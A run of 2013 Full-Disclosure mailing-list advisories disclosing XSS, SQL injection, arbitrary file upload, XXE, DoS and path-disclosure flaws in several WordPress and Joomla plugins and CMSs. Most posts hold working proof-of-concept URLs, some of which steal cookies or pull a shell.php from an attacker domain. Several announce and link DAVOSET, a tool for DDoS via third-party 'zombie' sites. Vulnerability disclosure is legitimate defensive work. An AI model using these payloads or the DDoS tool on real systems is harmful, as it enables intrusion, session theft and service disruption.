Hello list! I want to warn you about multiple vulnerabilities in plugin RokStories for WordPress. In August 2012 I wrote about multiple vulnerabilities in RokBox for WordPress (http://securityvulns.ru/docs28871.html). These vulnerabilities are similar, since the same developers put the same vulnerable TimThumb into another their plugin (vulnerabilities in which I disclosed already in 2011). These are Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service and Arbitrary File Upload vulnerabilities. In July 2013 developers released a patch for their plugins and themes with TimThumb (http://www.rockettheme.com/wordpress-updates/1871-security-patch-for-wordpress-timthumb), which can be used to fix these vulnerabilities (except the last FPD). - Affected products: - Vulnerable are RokStories 1.25 and previous versions (to attacks on TimThumb and all versions are vulnerable to FPD). Besides standalone WP plugin, this web application comes as part of the themes. Many of 56 RocketTheme's WP themes (http://www.rockettheme.com/wordpress-themes) use RokStories and old versions of these themes are vulnerable to attacks on TimThumb (and all versions of them are vulnerable to FPD). - Affected vendors: - RocketTheme http://www.rockettheme.com -- Details: -- XSS (WASC-08): http://site/wp-content/plugins/wp_rokstories/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg Full path disclosure (WASC-13): http://site/wp-content/plugins/wp_rokstories/thumb.php?src=http:// http://site/wp-content/plugins/wp_rokstories/thumb.php?src=http://site/page.png&h=1&w=111 http://site/wp-content/plugins/wp_rokstories/thumb.php?src=http://site/page.png&h=111&w=1 Abuse of Functionality (WASC-42): http://site/wp-content/plugins/wp_rokstories/thumb.php?src=http://site&h=1&w=1 http://site/wp-content/plugins/wp_rokstories/thumb.php?src=http://site.flickr.com&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on) DoS (WASC-10): http://site/wp-content/plugins/wp_rokstories/thumb.php?src=http://site/big_file&h=1&w=1 http://site/wp-content/plugins/wp_rokstories/thumb.php?src=http://site.flickr.com/big_file&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on) About such Abuse of Functionality and Denial of Service vulnerabilities you can read in my article Using of the sites for attacks on other sites (http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html). For such attacks my tool DAVOSET (http://websecurity.com.ua/davoset/) can be used. Arbitrary File Upload (WASC-31): http://site/wp-content/plugins/wp_rokstories/thumb.php?src=http://flickr.com.site.com/shell.php This Arbitrary File Upload vulnerability in TimThumb was disclosed last year after 3,5 months after my disclosure of previous holes. Full path disclosure (WASC-13): http://site/wp-content/plugins/wp_rokstories/rokstories.php Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] AFU, AFD and XSS vulnerabilities in Uploadify
Hello list! These are Arbitrary File Uploading, Arbitrary File Deletion and Cross-Site Scripting vulnerabilities in Uploadify. Particularly in the version used in aCMS (it looks like these developers use modified version of Uploadify, but other developers also can use such version). - Affected products: - Vulnerable are Uploadify v2.1.4 and potentially other versions. Particularly version in aCMS. Versions Uploadify 3.x are not vulnerable. -- Details: -- Arbitrary File Uploading (WASC-31): http://websecurity.com.ua/uploads/2013/Uploadify%20AFU.html http://site/uploadify.php"; method="post" enctype="multipart/form-data"> Arbitrary File Deletion (WASC-42): http://websecurity.com.ua/uploads/2013/Uploadify%20AFD.html http://site/uploadify.php"; method="post" enctype="multipart/form-data"> Cross-Site Scripting (WASC-08): http://websecurity.com.ua/uploads/2013/Uploadify%20XSS.html http://site/uploadify.php"; method="post" enctype="multipart/form-data"> http://websecurity.com.ua/uploads/2013/Uploadify%20XSS-2.html http://site/uploadify.php"; method="post" enctype="multipart/form-data"> The second attack can be done on Linux/Unix systems, where angle brackets can be used, or with spoofing headers. With the next headers (to specify XSS payload in extension): POST http://site/uploadify.php -240841995418756\r\n Content-Disposition: form-data; name="Filedata"; filename="test.onload=with(document)alert(cookie)>"\r\n Content-Type: application/octet-stream\r\n \r\n test\r\n \r\n -240841995418756\r\n Content-Disposition: form-data; name="folder"\r\n \r\n /uploadify\r\n -240841995418756--\r\n Timeline: 2013.03.04 - informed developers of aCMS about part of the vulnerabilities. 2013.04.03 - informed developers of aCMS about another part of the vulnerabilities. 2013.04.07 - informed developers of aCMS about another part of the vulnerabilities. 2013.05.25 - informed developers of aCMS about another part of the vulnerabilities. 2013.05.26 - informed developers of aCMS about another part of the vulnerabilities. In all cases the developers just ignored all messages via different e-mails and contact form. 2013.06.12 - announced at my site. 2013.06.22 - informed developers of Uploadify. 2013.09.12 - disclosed at my site (http://websecurity.com.ua/6566/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DAVOSET v.1.1.3
Hello participants of Mailing List. After making public release of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html), I've made next update of the software. At 31st of August DAVOSET v.1.1.3 was released - DDoS attacks via other sites execution tool (http://websecurity.com.ua/davoset/). Download DAVOSET v.1.1.3: http://websecurity.com.ua/uploads/2013/DAVOSET_v.1.1.3.rar Use, don't abuse. Among improvements in new version, in 1.1.3 there was added support of cookies (for those web sites which protect themselves from automated attacks by cookies). And was added support of setting ports. Also there were added new services into full list of zombies (including a cookies protected site). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Insufficient Authorization vulnerability in Act
Hello list! This is Insufficient Authorization vulnerability in Act. It is conference software on Perl. Besides Insufficient Authorization, there are a lot of other vulnerabilities in Act. - Affected products: - Vulnerable are all versions of Act (they fixed this hole at July 27, 2013). The developers don't use version numbers for their software. - Affected vendors: - Act - A Conference Toolkit http://act.mongueurs.net -- Details: -- Insufficient Authorization (WASC-02): http://site/edittalk?talk_id=1 Any authenticated user can edit arbitrary talks (by setting id). And also to delete them (via edit function). This vulnerability can be used to sabotage conference by deleting all talks. Timeline: 2013.07.14 - informed organizers of YAPC::Europe 2013, on which site I've found this and other holes. They ignored to fix this and all other holes at their site (which they had for 10 years while use Act), arguing that developers of Act should do that and they don't care about security of their site. 2013.07.14 - informed Act developers. They hadn't answered. 2013.07.16 - announced at my site. 2013.07.27 - developers fixed this vulnerability (without answering and thanking) (https://github.com/book/Act/commit/e9c5257594f7eb69c4f935fb14fadb1bc79b46d7). 2013.08.29 - disclosed at my site (http://websecurity.com.ua/6657/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] XSS and CS vulnerability in Soltech.CMS
Hello list! Earlier I wrote about SQL Injection vulnerability and these are new holes in Soltech.CMS. There are Cross-Site Scripting and Content Spoofing vulnerabilities in Soltech.CMS. This is commercial CMS. - Affected products: - Vulnerable are Soltech.CMS v 0.4 and previous versions. - Affected vendors: - Soltech http://soltech.com.ua -- Details: -- Vulnerable version JW Player 4.2.90 is used in the system. Cross-Site Scripting (WASC-08): http://site/plugins/flashplayer/player.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B http://site/plugins/flashplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg Content Spoofing (WASC-12): http://site/plugins/flashplayer/player.swf?file=1.flv&backcolor=0xFF&screencolor=0xFF http://site/plugins/flashplayer/player.swf?file=1.flv&image=1.jpg http://site/plugins/flashplayer/player.swf?config=1.xml http://site/plugins/flashplayer/player.swf?abouttext=Player&aboutlink=http://websecurity.com.ua Timeline: 2013.06.07 - informed developers about the first part of vulnerabilities. 2013.07.13 - announced at my site. 2013.07.14 - informed developers about the second part of vulnerabilities. 2013.08.27 - disclosed at my site (http://websecurity.com.ua/6653/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerabilities in multiple plugins for WordPress with GDD FLVPlayer
Hello list! These are Content Spoofing and Cross-Site Scripting vulnerabilities in multiple web applications with GDD FLVPlayer. Earlier I wrote about vulnerabilities in GDD FLVPlayer (http://seclists.org/fulldisclosure/2013/Aug/247). This is video and audio player, which is used at thousands web sites and in multiple web applications. Among them are the next themes for WordPress: I Love It (I wrote about it earlier http://seclists.org/fulldisclosure/2013/Jul/116), Megusta, Multipress, Lolzine, V1. Also this flash video and audio player is used as standalone web application in many custom themes and in different CMS (WordPress, Joomla) in non-themes folders. - Affected products: - Vulnerable are web applications which are using GDD FLVPlayer v3.635 and previous versions. Vulnerable are all versions of the next web applications: I Love It, Megusta, Multipress, Lolzine, V1. - Affected vendors: - GDD FLVPlayer was developed by GeDeDe. GeDeDe http://www.gdd.ro -- Details: -- XSS (via Flash Injection) (WASC-08): I Love It: http://site/wp-content/themes/iloveit/flv/gddflvplayer.swf?mylogo=xss.swf http://site/wp-content/themes/iloveit/flv/gddflvplayer.swf?splashscreen=xss.swf Megusta: http://site/wp-content/themes/megusta/flv/gddflvplayer.swf?mylogo=xss.swf http://site/wp-content/themes/megusta/flv/gddflvplayer.swf?splashscreen=xss.swf Multipress: http://site/wp-content/themes/multipress/flv/gddflvplayer.swf?mylogo=xss.swf http://site/wp-content/themes/multipress/flv/gddflvplayer.swf?splashscreen=xss.swf Lolzine: http://site/wp-content/themes/Lolzine/flv/gddflvplayer.swf?mylogo=xss.swf http://site/wp-content/themes/Lolzine/flv/gddflvplayer.swf?splashscreen=xss.swf V1: http://site/wp-content/themes/v1/flv/gddflvplayer.swf?mylogo=xss.swf http://site/wp-content/themes/v1/flv/gddflvplayer.swf?splashscreen=xss.swf Full path disclosure (WASC-13): All mentioned themes have FPD vulnerabilities in php-files (in index.php and others), which is typically for WP themes. http://site/wp-content/themes/iloveit/ http://site/wp-content/themes/megusta/ http://site/wp-content/themes/multipress/ http://site/wp-content/themes/Lolzine/ http://site/wp-content/themes/v1/ In the last theme the path can be v1, v1.0, v1.3.5 and other variants. And at some web sites Jplayer (about multiple vulnerabilities in which I wrote earlier) is used instead of GDD FLVPlayer. These are examples of XSS and FPD vulnerabilities, examples of 8 СS vulnerabilities see in above-mentioned advisory. I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/6731/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerabilities in multiple web applications with GDD FLVPlayer
Hello list! These are Content Spoofing and Cross-Site Scripting vulnerabilities in multiple web applications with GDD FLVPlayer. Earlier I've wrote about vulnerabilities in GDD FLVPlayer (http://seclists.org/fulldisclosure/2013/Aug/247). This is video and audio player, which is used at thousands web sites and in multiple web applications. Among them are Order Master Pro, CMS Pask (Pixelwerk admin), gddflvplayer for MODx, Pixelfind Administrator, WHMCompleteSolution. And other web applications. Also this flash video and audio player is used at many web sites as standalone web application. - Affected products: - Vulnerable are web applications which are using GDD FLVPlayer v3.635 and previous versions. Vulnerable are the next web applications: Order Master Pro (all versions) CMS Pask 3 (Pixelwerk admin v.3.3) and previous versions. gddflvplayer for MODx (all versions). Pixelfind Administrator (all versions). WHMCompleteSolution (all versions). - Affected vendors: - GDD FLVPlayer was developed by GeDeDe. GeDeDe http://www.gdd.ro -- Details: -- XSS (via Flash Injection) (WASC-08): Order Master Pro: http://site/op/video/gddflvplayer.swf?mylogo=xss.swf http://site/op/video/gddflvplayer.swf?splashscreen=xss.swf CMS Pask 3 (Pixelwerk admin): http://site/gddflvplayer.swf?mylogo=xss.swf http://site/gddflvplayer.swf?splashscreen=xss.swf gddflvplayer for MODx: http://site/assets/snippets/gddflvplayer/gddflvplayer.swf?mylogo=xss.swf http://site/assets/snippets/gddflvplayer/gddflvplayer.swf?splashscreen=xss.swf Pixelfind Administrator: http://site/includes/flash/gddflvplayer.swf?mylogo=xss.swf http://site/includes/flash/gddflvplayer.swf?splashscreen=xss.swf WHMCompleteSolution: http://site/player/gddflvplayer.swf?mylogo=xss.swf http://site/player/gddflvplayer.swf?splashscreen=xss.swf These are examples of XSS vulnerabilities, examples of 8 СS vulnerabilities see in above-mentioned advisory. I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/6727/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CS and XSS vulnerabilities in GDD FLVPlayer
Hello list! These are Content Spoofing and Cross-Site Scripting vulnerabilities in GDD FLVPlayer. - Affected products: - Vulnerable are GDD FLVPlayer v3.635 and previous versions. - Affected vendors: - GeDeDe http://www.gdd.ro -- Details: -- Content Spoofing (Flash Injection) (WASC-12): http://site/gddflvplayer.swf?mylogo=http://site2/1.swf http://site/gddflvplayer.swf?splashscreen=http://site2/1.swf It's possible to include flash-files with links. XSS (via Flash Injection) (WASC-08): http://site/gddflvplayer.swf?mylogo=xss.swf http://site/gddflvplayer.swf?splashscreen=xss.swf In old versions of Flash player the attack will work with flash file xss.swf at any domain, in new versions - only at the same domain. Content Spoofing (Content Injection) (WASC-12): http://site/gddflvplayer.swf?mylogo=http://site2/1.jpg http://site/gddflvplayer.swf?splashscreen=http://site2/1.jpg http://site/gddflvplayer.swf?advert=http://site2/1.flv http://site/gddflvplayer.swf?vdo=http://site2/1.flv Injecting images and playing video and audio (flv, mp4 and mp3 files) from external sites. Content Spoofing (Link Injection) (WASC-12): http://site/gddflvplayer.swf?clickTAG=http://websecurity.com.ua http://site/gddflvplayer.swf?vdo=http://site2/1.flv&endclipaction=http://websecurity.com.ua Timeline: 2013.07.10 - announced at my site. 2013.07.11 - informed developers. 2013.08.23 - disclosed at my site (http://websecurity.com.ua/6642/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerabilities in Avaya IP Office Customer Call Reporter
Hello list! I want to warn you about vulnerabilities in Avaya IP Office Customer Call Reporter. These are Remote HTML Include and Remote XSS Include (Cross-Site Scripting) vulnerabilities. After I found multiple vulnerabilities in Avaya IP Office Customer Call Reporter in December, I informed ZDI about them (critical ones). ZDI was very slow in processing these holes (regardless of my remindings) and only at 30th of July they begun actively working with them. I wrote about this case with ZDI in WASC Mailing List (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-July/008883.html). When Avaya ignored my informing in July and ZDI stopped working on this case in August (since Avaya was not responding to them also), I published these two vulnerabilities (the least critical). There are many other vulnerabilities, including critical holes which allow to take control over admin panel, so Avaya still has a chance to get details of vulnerabilities in their product before public disclosure. - Affected products: - Vulnerable are Avaya IP Office Customer Call Reporter 8.0.9.13 (tested in December 2012) and 9.0.0.0 (tested recently) and previous versions. - Affected vendors: - Avaya Inc. http://www.avaya.com -- Details: -- Remote HTML Include (Frame Injection) (WASC-12): http://site/CCRWebClient/Help/en-US/index.htm?//websecurity.com.ua Remote XSS Include (Cross-Site Scripting) (WASC-08): http://site/CCRWebClient/Help/en-US/index.htm?//websecurity.com.ua/webtools/xss_r2.html Timeline: 2012.12.06 - found multiple vulnerabilities (these ones and other critical holes). 2012.12.13 - informed ZDI about other critical vulnerabilities. 2012.12.18 - again informed ZDI about other critical vulnerabilities. 2013.01.27 - registered at zerodayinitiative.com and informed them through the site. ZDI started working on the case. 2013.07.28 - informed Avaya (via two contact forms) about these holes and other critical vulnerabilities, due to slowness of ZDI. 2013.07.29 - wrote about ZDI in WASC Mailing List. 2013.07.30 - if earlier ZDI only pretended they work on the case, then this time they started working actively on it (and tried to contact Avaya). 2013.08.07 - ZDI stopped working on the case and closed it, since Avaya was not responding. 2013.08.20 - disclosed at my site (http://websecurity.com.ua/6717/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CS, XSS and FPD vulnerabilities in MCImageManager for TinyMCE
Hello list! I want to warn you about vulnerabilities in Moxiecode Image Manager (MCImageManager). This is commercial plugin for TinyMCE. It concerns as MCImageManager, as all web applications which have MCImageManager in their bundle. These are Content Spoofing, Cross-Site Scripting and Full Path Disclosure vulnerabilities. About Content Spoofing and Cross-Site Scripting vulnerabilities in flvPlayer I informed developer already in October 2011 (it was part of Media plugin for TinyMCE) and disclosed them in November. After my informing he fixed these holes in November 2011 in Media plugin. But he forgot to fix them in MCImageManager plugin. - Affected products: - Vulnerable are Moxiecode Image Manager 3.1.5 and previous versions. - Affected vendors: - Moxiecode http://www.moxiecode.com -- Details: -- Content Spoofing (WASC-12): Flash-file flvPlayer.swf accepts arbitrary addresses in parameter flvToPlay and startImage, which allows to spoof content of flash - i.e. by setting addresses of video and/or image files from other site. http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.flv http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?autoStart=false&startImage=1.jpg http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.flv&autoStart=false&startImage=1.jpg Flash-file flvPlayer.swf accepts arbitrary addresses in parameter flvToPlay, which allows to spoof content of flash - i.e. by setting address of playlist file from other site (parameters thumbnail and url in xml-file accept arbitrary addresses). http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.xml File 1.xml: XSS (WASC-08): If at the site at page with flvPlayer.swf (with parameter jsCallback=true, or if there is possibility to set this parameter for flv_player.swf) there is possibility to include JS code with function flvStart() and/or flvEnd() (via HTML Injection), then it's possible to conduct XSS attack. I.e. JS-callbacks can be used for XSS attack. Example of exploit: function flvStart() { alert('XSS'); } function flvEnd() { alert('XSS'); } height="50%" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"; type="application/x-shockwave-flash"> Full Path Disclosure (WASC-13): Full path In cookies MCManager_im_lastPath and MCManagerHistoryCookie_im. Timeline: 2011.10.20 - informed developer of flvPlayer. 2011.10.20 - informed developer of TinyMCE (which bundled with flvPlayer in Media plugin). 2013.06.11 - announced at my site. 2013.06.13 - informed developer of MCImageManager. 2013.08.16 - disclosed at my site (http://websecurity.com.ua/6562/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SQL Injection vulnerability in Soltech.CMS
Hello list! There is SQL Injection vulnerability in Soltech.CMS. This is commercial CMS. - Affected products: - Vulnerable are Soltech.CMS v 0.4 and previous versions. - Affected vendors: - Soltech http://soltech.com.ua -- Details: -- SQL Injection (WASC-19): http://site/index.php?level_path=%27%20or%20version()=5%23 Timeline: 2013.06.05 - announced at my site. 2013.06.07 - informed developers about the first part of vulnerabilities. 2013.07.14 - informed developers about the second part of vulnerabilities. 2013.08.13 - disclosed at my site (http://websecurity.com.ua/6550/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] XXE Injection in Sybase EAServer
Hello! I'll give you additional information concerning advisory SEC Consult SA-20130719-0 :: Multiple vulnerabilities in Sybase EAServer (http://securityvulns.ru/docs29622.html). It's about XXE Injection in Sybase EAServer. Among vulnerabilities in EAServer there is XXE Injection and it was only mentioned about local file inclusion and directory listing attack vector. But this XXE Injection vulnerability also allows to conduct attacks on other sites. So I'll supplement SEC Consult's advisory and will bring your attention to another attack vector. I wrote about such attacks in my 2012's article "Using XML External Entities (XXE) for attacks on other sites" (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2012-August/008481.html) and 2013's "Using XXE vulnerabilities for attacks on other sites" (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-August/008887.html). As I described in my articles, XXE vulnerabilities can be used for conducting CSRF and DoS attacks on other sites (and at using multiple web sites it's possible to conduct DDoS attacks). And last month I released a tool for conducting such attacks - in DAVOSET v.1.1.2 I added support of XML requests for XXE vulnerabilities. XXE (WASC-43): For the attack it's needed to send the next XML data in POST request. http://site/page";>]> &xxe; 0 So all servers with affected versions of Sybase EAServer can be used for attacks on other sites via XXE. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Using XXE vulnerabilities for attacks on other sites
Hello participants of Mailing List. I'll tell you about using XXE vulnerabilities for attacks on other sites (about it I already wrote last year). Those who haven't read my 2012's article "Using XML External Entities (XXE) for attacks on other sites" (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2012-August/008481.html) can do it now to remind this topic for themselves. In that article I've told about using XML External Entities (XXE) vulnerabilities (WASC-43) for conducting CSRF and DoS attacks on other sites. And in new article I continued this topic. In June I wrote new article "Using XXE vulnerabilities for attacks on other sites", which I translated recently (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-August/008887.html). I described many new software and web applications, which are vulnerable to XXE, such as libraptor, Advanced XML Reader, PHP 5.3 and 5.4, WordPress 3.5 and 3.5.1 and Sybase EAServer. And mentioned about my tool for automation of such attacks - DAVOSET. Which can be used for conducting attacks on other sites via Abuse of Functionality vulnerabilities and I was planning to add support of attacks via XXE. Last month I released DAVOSET v.1.1.2 - DDoS attacks via other sites execution tool. In this version I added support of XML requests for XXE vulnerabilities. So now you can use XML External Entities (XXE) holes at web sites for conducting automated DoS and DDoS attacks on other sites. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] XSS and FPD vulnerabilities in WPtouch and WPtouch Pro for WordPress
Hello list! I want to inform you about vulnerabilities in WPtouch and WPtouch Pro plugins for WordPress. These are Cross-Site Scripting and Full path disclosure vulnerabilities. These XSS holes are in ZeroClipboard.swf, which is used in the plugin. In February I wrote about Cross-Site Scripting vulnerabilities in ZeroClipboard (http://seclists.org/fulldisclosure/2013/Feb/103) and in multiple web applications. - Affected products: - Vulnerable are all versions of plugin WPtouch and WPtouch Pro. - Affected vendors: - BraveNewCode http://www.bravenewcode.com -- Details: -- Cross-Site Scripting (WASC-08): XSS via id parameter and XSS via copying payload into clipboard (as described in my advisory). http://site/wp-content/plugins/wptouch-pro/admin/js/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height Full path disclosure (WASC-13): http://site/wp-content/plugins/wptouch/wptouch.php http://site/wp-content/plugins/wptouch-pro/wptouch-pro.php And other php-files in plugin folder and subfolders. http://site/wp-content/plugins/wptouch/error_log http://site/wp-content/plugins/wptouch-pro/error_log In plugin folder and subfolders (at web sites where showing errors is off and they are saving into error_log). Timeline: 2013.02.18 - informed old and new developers of ZeroClipboard. 2013.04.17 - announced at my site and later informed developers of WPtouch and WPtouch Pro. 2013.08.03 - disclosed at my site (http://websecurity.com.ua/6454/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] XSS and CS vulnerabilities in aCMS
Hello list! After previous Cross-Site Scripting, Content Spoofing, Information Leakage, Insufficient Authorization and Arbitrary File Uploading vulnerabilities in aCMS, here are new ones. These are Cross-Site Scripting and Content Spoofing vulnerabilities in aCMS. This is commercial CMS. - Affected products: - Vulnerable are aCMS 1.0 and previous versions. - Affected vendors: - Almacor http://almacor.ru -- Details: -- Cross-Site Scripting (WASC-08): http://site/assets/js/tiny_mce/plugins/images/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// http://site/assets/js/tiny_mce/plugins/images/js/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E Content Spoofing (WASC-12): http://site/assets/js/tiny_mce/plugins/images/js/swfupload/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E http://site/assets/js/tiny_mce/plugins/images/js/swfupload/swfupload.swf?buttonImageURL=http://demo.swfupload.org/v220/images/logo.gif Timeline: 2013.03.04 - informed developers about part of the vulnerabilities. 2013.04.03 - informed developers about another part of the vulnerabilities. 2013.04.07 - informed developers about another part of the vulnerabilities. 2013.05.24 - announced at my site. 2013.05.25 - informed developers about another part of the vulnerabilities. 2013.05.26 - informed developers about another part of the vulnerabilities. In all cases the developers just ignored all messages via different e-mails and contact form. 2013.07.31 - disclosed at my site (http://websecurity.com.ua/6535/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DAVOSET v.1.1.2
Hello participants of Mailing List. After making public release of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html), I've made next update of the software. Today DAVOSET v.1.1.2 was released - DDoS attacks via other sites execution tool (http://websecurity.com.ua/davoset/). Download DAVOSET v.1.1.2: http://websecurity.com.ua/uploads/2013/DAVOSET_v.1.1.2.rar Use, don't abuse. Among other improvements in new version, in 1.1.2 there was added support of XML requests for XXE vulnerabilities. So now you can use XML External Entities vulnerabilities at web sites for conducting DoS and DDoS attacks. Also there were added new services into full list of zombies. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DoS and XSS vulnerabilities in Googlemaps plugin for Joomla
Hello list! Earlier I wrote about multiple vulnerabilities in Googlemaps plugin for Joomla (http://securityvulns.ru/docs29645.html). After my informing, the developer fixed these vulnerabilities in versions 2.19 and 3.1 of the plugin - by removing proxy functionality. And in version 3.2 of the plugin he introduced new proxy functionality, which must be protected against previous attacks. But after my checking, I've found two holes in the last version of the plugin. These are Denial of Service and Cross-Site Scripting vulnerabilities in Googlemaps plugin for Joomla. - Affected products: - Vulnerable is Googlemaps plugin v3.2 for Joomla. I've informed the developer about these holes. Now he is working on a new version. - Affected vendors: - Mike Reumer http://extensions.joomla.org/extensions/maps-a-weather/maps-a-locations/maps/1147 -- Details: -- To bypass protection for accessing this script it's needed to set referer, cookie and token. The referer is current site, the cookie is set by the site (Joomla) itself and the token can be found at page which uses plugin of the site (and it's setting in URL). This data can be taken from the site automatically. Referer: http://site Cookie: dc9023a0ff4f8a00f9b2f4e7600c17f4=69c59f0263b70f9343e0a75a93bd44a0 Denial of Service (WASC-10): http://site/plugins/system/plugin_googlemap3/plugin_googlemap3_kmlprxy.php?url=site2/large_file&1e17f7d3d74903775e5c524dbe2cd8f1=1 Besides conducting DoS attack manually, it's also possible to conduct automated DoS and DDoS attacks with using of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-July/008879.html). Cross-Site Scripting (WASC-08): http://site/plugins/system/plugin_googlemap3/plugin_googlemap3_kmlprxy.php?url=site2/xss.html&1e17f7d3d74903775e5c524dbe2cd8f1=1 Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DAVOSET v.1.1.1
Hello participants of Mailing List. After making public release of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html), I've made next update of the software. Yesterday DAVOSET v.1.1.1 was released - DDoS attacks via other sites execution tool (http://websecurity.com.ua/davoset/). Download DAVOSET v.1.1.1: http://websecurity.com.ua/uploads/2013/DAVOSET_v.1.1.1.rar Use, don't abuse. Besides improvements in new version, in 1.1.1 there were added a lot of new zombie-services - 105 new services, most of them are web sites with Googlemaps plugin for Joomla. Also I've improved work with services which don’t support "http://"; for target site (this is made for Googlemaps). Last week one man, who like DAVOSET, sent me large list of zombie-servers for my tool (big thanks for him). In that list I've found a lot of web sites with Googlemaps, which I checked and found multiple vulnerabilities in this plugin, which I disclosed recently. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] AFU and XSS vulnerabilities in TinyMCE Image Manager
